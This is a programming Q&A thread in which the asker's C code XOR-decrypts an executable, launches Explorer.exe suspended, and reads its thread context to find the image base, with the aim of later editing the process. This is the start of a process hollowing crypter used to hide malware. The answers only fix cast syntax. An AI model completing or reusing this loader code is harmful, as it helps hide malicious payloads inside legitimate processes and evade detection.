# Expected Expression before 'LPCVOID' in C?

Tags: c, winapi

I want to get `ImageBase` for a `Process`, so i can edit its contents later.

this is my code :

```
HANDLE hFile = CreateFile("0x2.exe", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
        // get file size
        DWORD dwFileSize = GetFileSize(hFile, NULL);

        // decrypt and obtain decrypted bytes
        LPVOID lpFileBytes = Crypt(hFile, dwFileSize);
        CloseHandle(hFile);
        free(lpFileBytes);

         //execute file
         //

    LPBYTE lpBuffer = lpFileBytes;
    PIMAGE_DOS_HEADER IDH;
    PIMAGE_NT_HEADERS INH;
    PIMAGE_SECTION_HEADER ISH;
    DWORD dwImageBase;

    IDH = (PIMAGE_DOS_HEADER)&lpBuffer[0];
if (IDH->e_magic != IMAGE_DOS_SIGNATURE) { return 0;}
INH = (PIMAGE_NT_HEADERS)&lpBuffer[IDH->e_lfanew];

if (INH->Signature != IMAGE_NT_SIGNATURE) { return 0;}

    PROCESS_INFORMATION pi;
    STARTUPINFO si;
    ZeroMemory(&si,sizeof(si));
    si.cb = sizeof(si);

    CreateProcess("Explorer.exe",NULL,NULL,NULL,FALSE,0x0000004,NULL,NULL,&si,&pi);

        CONTEXT context;
        context.ContextFlags = (CONTEXT_FULL);
        GetThreadContext(pi.hThread,&context);

        ReadProcessMemory(pi.hProcess,LPCVOID(context->Ebx + 8),LPVOID(&dwImageBase),4,NULL);
```

and function Crypt code:

```
LPVOID Crypt(HANDLE hFile, DWORD dwFileSize) {
    // allocate buffer for file contents
    LPVOID lpFileBytes = malloc(dwFileSize);
    // read the file into the buffer
    ReadFile(hFile, lpFileBytes, dwFileSize, NULL, NULL);

    // apply XOR encryption
    int i;
    char key[3] = {'*', '~', '#'};
    for (i = 0; i < dwFileSize; i++) {
        *((LPBYTE)lpFileBytes + i) ^= key[i % sizeof(key)];
    }

    return lpFileBytes;
}
```

when i run the code it gives me this Error

> Expected Expression before 'LPCVOID' in this line :

```
ReadProcessMemory(pi.hProcess,LPCVOID(context->Ebx + 8),LPVOID(&dwImageBase),4,NULL);
```

Comment: On a side note, after calling `Crypt()`, you are calling `free(lpFileBytes)` before accessing the data that `lpFileBytes` points at.

Answer (score 4, accepted):

You probably intend to cast:

```
ReadProcessMemory(pi.hProcess, (LPCVOID)(context->Ebx + 8), (LPVOID)(&dwImageBase),4,NULL);
```

Comment: i did this before , but it gives me another Error " error: invalid type argument of '->' (have 'CONTEXT {aka struct _CONTEXT}')| "

Comment: @Test065 `context` is not a pointer, so use `context.Ebx` instead of `context->Ebx`

Comment: This certainly isn't the *"best answer"*, by any stretch of the term. It's not even a good answer, as it fails to contain the bog standard minimum of any quality answer: It neither explains, what's wrong, nor how the proposed changes address that. It is no more complete than any other code-only answer. Sure, those are frequently picked as the *"best answer"* by those 'contributors' that just come here to get their code to compile.

Answer (score -1):

Since I cannot see a question I'll have to guess what it might be and provide an answer for that: The problem is, that you copied C++ code, and without understanding it, just assumed that it looked remarkably like C code.

But this time around, cargo-culting this through didn't pan out. You picked C++ that isn't C. While a [functional cast expression](https://en.cppreference.com/w/cpp/language/explicit_cast) (`new_type(expression)`) is valid in C++, it isn't valid C. You'll have to go with a C-style cast expression (`(new_type)expression`).

Comment: i like the way you talk , but first of all i didnt copy and paste , i understand each word of the code , and guess what , i tried the solution you give me before 1 week and it didnt solve my problem .

Comment: @tes Apparently, this [does solve](https://stackoverflow.com/questions/62722539/expected-expression-before-lpcvoid-in-c/62722946?noredirect=1#comment110919924_62722565) the problem you are asking about. The fact that you don't know how to solve the **next** issue doesn't invalidate this answer.